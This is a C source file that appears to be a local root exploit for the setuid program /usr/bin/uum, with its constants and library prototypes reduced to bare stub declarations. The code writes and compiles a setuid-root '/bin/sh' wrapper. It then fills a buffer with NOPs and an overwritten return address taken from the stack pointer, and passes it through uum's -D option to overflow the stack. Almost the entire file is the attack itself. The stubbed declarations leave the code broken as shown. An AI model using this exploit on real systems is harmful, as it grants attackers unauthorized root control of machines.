
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char* COMPILER ;
 int EXP_ADR ;
 int JMP_OFS ;
 size_t MAXBUF ;
 int NOP ;
 size_t RET_ADR ;
 char* SHELL ;
 int exec ;
 int execl (char*,char*,char*,char*,char*) ;
 int exit (int) ;
 int fclose (int *) ;
 int * fopen (char*,char*) ;
 int * fp ;
 int fprintf (int *,char*) ;
 int get_sp () ;
 int ip ;
 int memset (char*,int ,size_t) ;
 int printf (char*,...) ;
 int sp ;
 int sprintf (char*,char*,char*,...) ;
 int strcat (int ,char*) ;
 int strlen (int ) ;
 int strncpy (char*,int ,int ) ;
 int system (char*) ;
 char* xx ;

main()
{
    strcat(exec,SHELL);
    sprintf(xx,"%s.c",SHELL);
    if ((fp=fopen(xx,"w"))==((void*)0)){
        printf("Can not write to %s\n",xx);
        exit(1);
    }
    fprintf(fp,"main(){setuid(0);setgid(0);system(\"/bin/sh\");}");
    fclose(fp);
    sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
    system(xx);

    sp=get_sp();
    memset(xx,NOP,MAXBUF);
    ip=sp-JMP_OFS;
    printf("Jumping address = %x\n",ip);
    xx[RET_ADR ]=ip&0xff;
    xx[RET_ADR+1]=(ip>>8)&0xff;
    xx[RET_ADR+2]=(ip>>16)&0xff;
    xx[RET_ADR+3]=(ip>>24)&0xff;
    strncpy(xx+EXP_ADR,exec,strlen(exec));
    xx[MAXBUF]=0;
    execl("/usr/bin/uum","uum","-D",xx,(char *) 0);
}
